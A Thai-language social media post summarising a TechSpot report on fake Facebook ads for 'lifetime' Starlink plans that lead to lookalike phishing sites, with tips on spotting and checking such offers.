    เข้าเว็บไซต์ทางการของบริษัทเพื่อตรวจสอบ
    ตรวจสอบบัญชีโซเชียลมีเดียที่ได้รับการยืนยัน
    โทรสอบถามฝ่ายบริการลูกค้าโดยตรง

    https://www.techspot.com/news/108874-viral-lifetime-starlink-offer-facebook-total-scam.html
    🧠 เรื่องเล่าจากอวกาศปลอม: เมื่อ Starlink ถูกแอบอ้างเพื่อหลอกเงินผู้บริโภค ช่วงกลางปี 2025 มีโฆษณาบน Facebook ที่อ้างว่าเสนอ “แพ็กเกจอินเทอร์เน็ต Starlink ตลอดชีพ” ในราคาเพียง $127 หรือแม้แต่ “แผนรายปี $67” พร้อมจานรับสัญญาณ Starlink Mini ฟรี ฟังดูคุ้มเกินจริงใช่ไหม? เพราะมันคือ “หลอกลวงเต็มรูปแบบ”2 เมื่อผู้ใช้คลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่เลียนแบบหน้าตาและโลโก้ของ Starlink อย่างแนบเนียน เช่น “ministarnt.xyz” หรือ “starlinkoficial.com” ซึ่งใช้ภาพจริงและคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ เว็บไซต์เหล่านี้หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตและที่อยู่จัดส่ง โดยไม่มีการส่งสินค้าใด ๆ หรือส่งอุปกรณ์ปลอมที่ไม่สามารถเชื่อมต่อกับดาวเทียมได้เลย บางรายยังถูกขโมยข้อมูลและพบธุรกรรมแปลก ๆ ในบัญชีธนาคารภายหลัง SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้ และย้ำว่าโปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการเท่านั้น เช่น การแจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน ✅ มีการหลอกลวงผ่าน Facebook โดยอ้างว่าเป็นแพ็กเกจ Starlink ตลอดชีพ ➡️ ราคาเพียง $127 หรือ $67 ต่อปี พร้อมจาน Starlink Mini ฟรี ➡️ ดูเหมือนถูกมากเมื่อเทียบกับค่าบริการจริงที่ $120 ต่อเดือน ✅ เว็บไซต์ปลอมเลียนแบบหน้าตา Starlink อย่างแนบเนียน ➡️ ใช้ชื่อโดเมนคล้ายของจริง เช่น “starlinkoficial.com” ➡️ มีโลโก้ ภาพสินค้า และคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ ✅ เมื่อผู้ใช้กรอกข้อมูล จะถูกขโมยเงินหรือข้อมูลส่วนตัว ➡️ บางรายไม่ได้รับสินค้าเลย หรือได้อุปกรณ์ปลอมที่ใช้ไม่ได้ ➡️ พบธุรกรรมแปลก ๆ ในบัญชีหลังจากซื้อสินค้า ✅ SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้ ➡️ โปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการ ➡️ ตัวอย่างโปรจริง: แจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน (มูลค่า $499) ✅ ผู้ใช้ทั่วโลกเริ่มร้องเรียนบนโซเชียลมีเดียตั้งแต่เดือนพฤษภาคม ➡️ PCMag พบหลายรูปแบบของโฆษณาหลอกลวงเมื่อค้นคำว่า “Starlink” บน Facebook ✅ วิธีตรวจสอบว่าโปรโมชั่นจริงหรือไม่ ➡️ เข้าเว็บไซต์ทางการของบริษัทเพื่อตรวจสอบ ➡️ ตรวจสอบบัญชีโซเชียลมีเดียที่ได้รับการยืนยัน ➡️ โทรสอบถามฝ่ายบริการลูกค้าโดยตรง https://www.techspot.com/news/108874-viral-lifetime-starlink-offer-facebook-total-scam.html
    WWW.TECHSPOT.COM
    That viral lifetime Starlink offer on Facebook is a total scam
    The latest scam making the rounds on Facebook promises a lifetime subscription to SpaceX's Starlink satellite Internet service for as low as $127 – roughly as much...
    0 Comments 0 Shares 100 Views 0 Reviews
More Results